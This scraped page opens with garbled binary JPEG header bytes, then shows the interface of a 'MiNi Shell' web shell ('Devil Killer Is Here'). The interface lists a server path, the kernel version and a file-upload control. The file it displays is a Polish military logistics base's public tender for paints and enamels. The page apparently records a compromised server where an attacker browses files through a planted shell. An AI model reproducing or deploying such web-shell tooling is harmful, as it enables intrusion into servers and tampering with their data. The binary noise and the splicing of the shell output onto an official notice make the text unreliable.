JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250918/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250918/0042995601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa farb i emalii </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">1 REGIONALNA BAZA LOGISTYCZNA</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 320927404</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Ciasna 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Wałcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">78-601</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL427 - Szczecinecko-pyrzycki</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">1rblog.szp@ron.mil.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">1rblog.wp.mil.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka budżetowa</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Obrona</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa farb i emalii </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-85882455-4591-4cf7-8a69-d572feca286d</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00429956</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00062419/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.21 Dostawa farb i emalii</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/1176811</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej:<br/>1. Wszelkie instrukcje korzystania z platformy zakupowej dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu platformy są dostępne pod adresem: https://platformazakupowa.pl/strona/45-instrukcje<br/>2. Zamawiający w zakresie pytań technicznych związanych z działaniem systemu prosi o kontakt z Centrum Wsparcia Klienta platformazakupowa.pl pod numer telefonu: 22 101 02 02 oraz adres e-mail: cwk@platformazakupowa.pl</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 i 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.U.UE.L.2016.119.1 z dnia 2016.05.04), dalej „RODO” informujemy, że:<br/>1. Administratorem Pani/Pana danych jest 1 Regionalna Baza Logistyczna z siedzibą w Wałczu (78-600) przy ul. Ciasnej 7, tel. 261 472 424, reprezentowana przez Komendanta;<br/>2. W sprawach związanych z danymi osobowymi proszę kontaktować się z Inspektorem Ochrony Danych, listownie na adres: ul. Ciasna 7, 78 – 600 Wałcz, wysyłając wiadomość na adres e – mail: 1rblog.iod@ron.mil.pl lub dzwoniąc pod numer tel. 261 472 209;<br/>Więcej informacji zawarto w Rozdziale XXII SWZ &#34;Ochrona Danych Osobowych (RODO)&#34;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">82/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa emalii w ilościach i asortymencie wskazanym poniżej: <br/>(lp. przedmiot zamówienia, j.m., ilość)<br/>1.	MIKRO-PISAK BIAŁY poj. 8ml do 12ml szt.	23<br/>2.	EMALIA POLIURETANOWA KHAKI RAL 6014 PÓŁM.	L	802<br/>3.	EMAL.POLIURET. KOŚĆ SŁ. RAL 1013 PÓŁMAT	L	10<br/>4.	EMALIA CHLOROKAUCZUKOWA BIAŁA OP. 5 L	szt.	15<br/>5.	EMALIA CHLOROKAUCZUKOWA POMARAŃCZOWA	L	31<br/>6.	EMALIA CHLOROKAUCZUKOWA ŻÓŁTA OP. 5 L	szt.	1<br/>7.	Emalia ftalowa maszynowa olejoodporna żółta op. 5 L	L	10<br/>8.	EMALIA FTALOWA NADWODNA 2 MALOWANIE SZARA ŚREDNA L 20<br/>9.	EMALIA FTALOWA SZARA - ŚREDNIA RAL 7035	L	500<br/>10.	EMALIA FTALOWA SZARA JASNA L	51<br/>11.	EMALIA KARBAMIDOWA RENOWACYJNA CZARNA	L	19<br/>12.	EMALIA KARBAMIDOWA RENOWACYJNA POMARAŃCZOWA	L 36<br/>13.	EMALIA KARBAMIDOWA RENOWACYJNA ŻÓŁTA L	10<br/>14.	EMALIA NITRO CZARNA L	68<br/>15.	EMALIA POLIURETANOWA RAL3016 CZERWONA	L	10<br/>16.	EMALIA POLIURETANOWA RAL9016 BIAŁA	L	59<br/>17.	EMALIA POLIURETANOWA SZARA RAL 7035 PÓŁMAT L	540<br/>18.	EMALIA POLIURETANOWA ŻÓŁTA RAL 1023	L	10<br/>19.	EMALIA POLIURETANOWA CZARNA RAL 9005 PÓŁMAT L	250<br/>20.	EMALIA ŻÓŁTA POŁYSK RAL 1023 400ML	szt.	6<br/>21.	PODKŁAD 5:1 BIAŁY T4W 555 0,96L lub równoważny szt.	200<br/>22.	PODKŁAD EPOKSYDOWY EPOXY PRIMER RANAL 1:1 lub równoważny kpl	350<br/>23.	PODKŁAD EPOKSYDOWY UTWARDZACZ HEMPEL 95360 lub równoważny	L	15<br/>24.	SZPACHLA NATRYSKOWA BOLL 002022 1,2KG lub równoważny kpl	200<br/>25.	SZPACHLÓWKA UNIWERSALNA	kg	40<br/>26.	ŚRODEK DO KONSERWACJI PODWOZIA L	400 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44800000-8 - Farby, lakiery i mastyksy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44812100-6 - Emalie i glazury</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu przy zastosowaniu kryteriów oceny ofert: cena oraz termin wykonania zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest dostawa farb w ilościach i asortymencie wskazanym poniżej: <br/>(lp. przedmiot zamówienia, j.m., ilość)<br/>1.	FARBA AKRYLOWA SPRAY KHAKI RAL 7009	szt.	167<br/>2.	FARBA AKRYLOWA SPRAY NIEBIESKA szt.	66<br/>3.	FARBA BIAŁA AKRYLOWA SPRAY POŁYSK szt.	78<br/>4.	FARBA BIAŁA SPRAY MATOWA szt.	128<br/>5.	FARBA CZARNA AKRYLOWA SPRAY MATOWA szt.	472<br/>6.	FARBA CZARNA AKRYLOWA SPRAY POŁYSK szt.	454<br/>7.	FARBA AKRYLOWA CZERWONA RAL 3024 SPRAY 400ML	szt.	10<br/>8.	FARBA AKRYLOWA BIAŁA L	103<br/>9.	FARBA AKRYLOWA KHAKI L	76<br/>10.	FARBA AKRYLOWA NIEBIESKA L	5<br/>11.	FARBA AKRYLOWA SPRAY BIAŁA POŁMAT	szt.	35<br/>12.	FARBA AKRYLOWA SPRAY CZARNA PÓŁMAT	szt.	97<br/>13.	FARBA AKRYLOWA SPRAY KHAKI szt.	180<br/>14.	FARBA AKRYLOWA SPRAY ZIELONA szt.	38<br/>15.	FARBA AKRYLOWA SPRAY ŻÓŁTA 400ML	szt.	19<br/>16.	FARBA AKRYLOWA SZARA JASNA L	36<br/>17.	FARBA ALKIDOWA NAWIERZCHNIOWA KHAKI L	180<br/>18.	FARBA ANTYKOR. PODKŁ. SZARA SPRAY 400ML	szt.	5<br/>19.	Farba antykorozyjna PENETROL, Złoty Stok kolor szara lub równoważny szt.	20<br/>20.	Farba ftalowa biała szt.	64<br/>21.	Farba ftalowa brązowa	L	22<br/>22.	Farba ftalowa czarna L	100,8<br/>23.	Farba ftalowa czarna szt.	8<br/>24.	Farba ftalowa czerwona szt.	32<br/>25.	Farba ftalowa czerwona ciemna L	7<br/>26.	Farba ftalowa gruntowa czerwona tlenkowa	L	59<br/>27.	Farba ftalowa khaki L	1010<br/>28.	Farba ftalowa khaki półmat	L	108<br/>29.	Farba ftalowa kość słoniowa L	5<br/>30.	Farba ftalowa niebieska L	21,6<br/>31.	Farba ftalowa szara jasna RAL 7035 L	6,3<br/>32.	Farba ftalowa szara ciemna L	49,5<br/>33.	Farba ftalowa szara jasna L	30<br/>34.	Farba ftalowa zielona L	55,8<br/>35.	Farba ftalowa żółta L	78<br/>36.	FARBA HEMPADUR 17630 lub równoważny L	17<br/>37.	FARBA HEMPADUR 45143 KOLOR czerwony 50630 + utwardzacz lub równoważny L	120<br/>38.	Farba HEMPADUR FAST DRY 45410 RAL 6006 + utwardzacz lub równoważny	L	120<br/>39.	Farba HEMPATHANE TOPCOAT 55210 + utwardzacz RAL 7042 lub równoważny L	20<br/>40.	Farba młotkowa srebrnoszara 2,5 L szt.	12<br/>41.	Farba nawierzchniowa koloru khaki RAL 6006	L	5<br/>42.	Farba niebieska SPRAY	szt.	39<br/>43.	Farba nitro biała L	16<br/>44.	Farba nitro czarna L	40<br/>45.	Farba nitro khaki L	140<br/>46.	Farba nitro zielona L	10<br/>47.	Farba nitro żółta L	21<br/>48.	Farba olejno-ftalowa Śnieżka biała 10 L lub równoważny szt. 2<br/>49.	FARBA MŁOTKOWA SREBRNOSZARA	L	33<br/>50.	Farba podkładowa czerwona KONKOR C lub równoważny L	104<br/>51.	Farba podkładowa popielata ftalowa L	515<br/>52.	FARBA POLIURETANOWA KHAKI MAT RAL 6006	L	60<br/>53.	Farba poliuretanowa podkładowa szara Ral 7035	L	473<br/>54.	FARBA PROSZKOWA P411 RAL9005 CZARNA	kg	25<br/>55.	Farba proszkowa poliestrowa RAL 9005 CZARNY MATOWY kg 50<br/>56.	Farba proszkowa poliestrowa RAL 9005 CZARNY POŁYSK	kg	50<br/>57.	Farba proszkowa poliestrowa RAL 9006 ALUMINIOWY POŁYSK	kg	50<br/>58.	Farba rdzochronna czerwona Tlenkowa	L	24<br/>59.	Farba srebrzanka ognioodporna	L	25<br/>60.	Farba szara SPRAY	szt. 82<br/>61.	FARBA ŻAROODPORNA ALUM. 400ML	szt.	40<br/>62.	FARBA ŻAROODPORNA ALKITERM 600 CZARNA 1L lub równoważny L	20<br/>63.	Farba żaroodporna czarna spray 0,4 L	szt.	12<br/>64.	Farba żaroodporna srebrna spray	szt.	2<br/>65.	FARBA ŻAROODPORNA SREBRZANKA PROCHEM 1L lub równoważny	szt.	23<br/>66.	Lakier w spray 400ml RAL6014 KHAKI	L	4<br/>67.	Lakier żółty RAL1023 400 ML	szt.	10 </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">44800000-8 - Farby, lakiery i mastyksy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44810000-1 - Farby</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona wyboru najkorzystniejszej oferty spośród ofert niepodlegających odrzuceniu przy zastosowaniu kryteriów oceny ofert: cena oraz termin wykonania zamówienia.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">„Oświadczenie dotyczące braku podstaw wykluczenia”, o którym mowa w art. 125 ust. 1 ustawy Pzp – załącznik nr 2 do SWZ;<br/>„Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu którym mowa w art. 125 ust. 1 uPzp&#34; wg. załącznika nr 3 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Dotyczy zadania nr 1 poz. nr 21 – 24 oraz zadania nr 2 poz. nr 19, 36 – 39, 48, 50, 62 i 65 – w przypadku zaoferowania równoważnego przedmiotu zamówienia.<br/>W celu potwierdzenia zgodności oferowanego równoważnego przedmiotu zamówienia z wymaganiami określonymi przez Zamawiającego w „Opisie przedmiotu zamówienia”, Załącznik nr 5 do niniejszej SWZ, Zamawiający żąda aby Wykonawca oferujący równoważny przedmiot zamówienia przedłożył do oferty przedmiotowy środek dowodowy, tj. kartę techniczną i/lub kartę charakterystyki i/lub inny dokument zawierający informację o parametrach zaoferowanego przedmiotu zamówienia, potwierdzający, że oferowany przedmiot zamówienia jest zgodny z wymaganiami dla produktów równoważnych zamieszczonymi w „Opisie Przedmiotu Zamówienia” stanowiącym załącznik nr 5 SWZ.<br/>Parametry zawarte w/w wymienionych dokumentach powinny być wystarczające do potwierdzenia równoważności oferowanego produktu. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> Dotyczy zadania nr 1 poz. nr 21 – 24 oraz zadania nr 2 poz. nr 19, 36 – 39, 48, 50, 62 i 65 – w przypadku zaoferowania równoważnego przedmiotu zamówienia.<br/>W celu potwierdzenia zgodności oferowanego równoważnego przedmiotu zamówienia z wymaganiami określonymi przez Zamawiającego w „Opisie przedmiotu zamówienia”, Załącznik nr 5 do niniejszej SWZ, Zamawiający żąda aby Wykonawca oferujący równoważny przedmiot zamówienia przedłożył do oferty przedmiotowy środek dowodowy, tj. kartę techniczną i/lub kartę charakterystyki i/lub inny dokument zawierający informację o parametrach zaoferowanego przedmiotu zamówienia, potwierdzający, że oferowany przedmiot zamówienia jest zgodny z wymaganiami dla produktów równoważnych zamieszczonymi w „Opisie Przedmiotu Zamówienia” stanowiącym załącznik nr 5 SWZ.<br/>Parametry zawarte w/w wymienionych dokumentach powinny być wystarczające do potwierdzenia równoważności oferowanego produktu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy wspólnie ubiegający się o udzielnie zamówienia (np. konsorcja, spółki cywilne lub inna forma prawna):<br/>1) W przypadku Wykonawców wspólnie ubiegających się o udzielnie zamówienia, żaden z Wykonawców nie może podlegać wykluczeniu w okolicznościach, o których mowa w Rozdziale VIII SWZ. Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego.<br/>2) Dokumenty składane przez Wykonawców wspólnie ubiegających się o udzielnie zamówienia, w tym oświadczenia muszą być podpisane przez wyznaczonego pełnomocnika lub osobę upoważnioną do reprezentowania danego podmiotu. W toku postępowania, wszelka korespondencja ze strony Zamawiającego, kierowana będzie do pełnomocnika, o którym mowa powyżej.<br/>2. Każda z firm wspólnie składających ofertę, złoży oddzielnie dla każdej z nich „Oświadczenie o braku podstaw wykluczenia” stanowiące załącznik nr 2 do SWZ oraz „Oświadczenie o aktualności informacji zawartych w oświadczeniu, o<br/>którym mowa w art. 125 ust. 1 uPzp, w zakresie podstaw wykluczenia z postępowania&#34; stanowiące załącznik nr 3 do SWZ.<br/>3. Wykonawcy wspólnie ubiegający się o zamówienie publiczne zobowiązani są przedłożyć 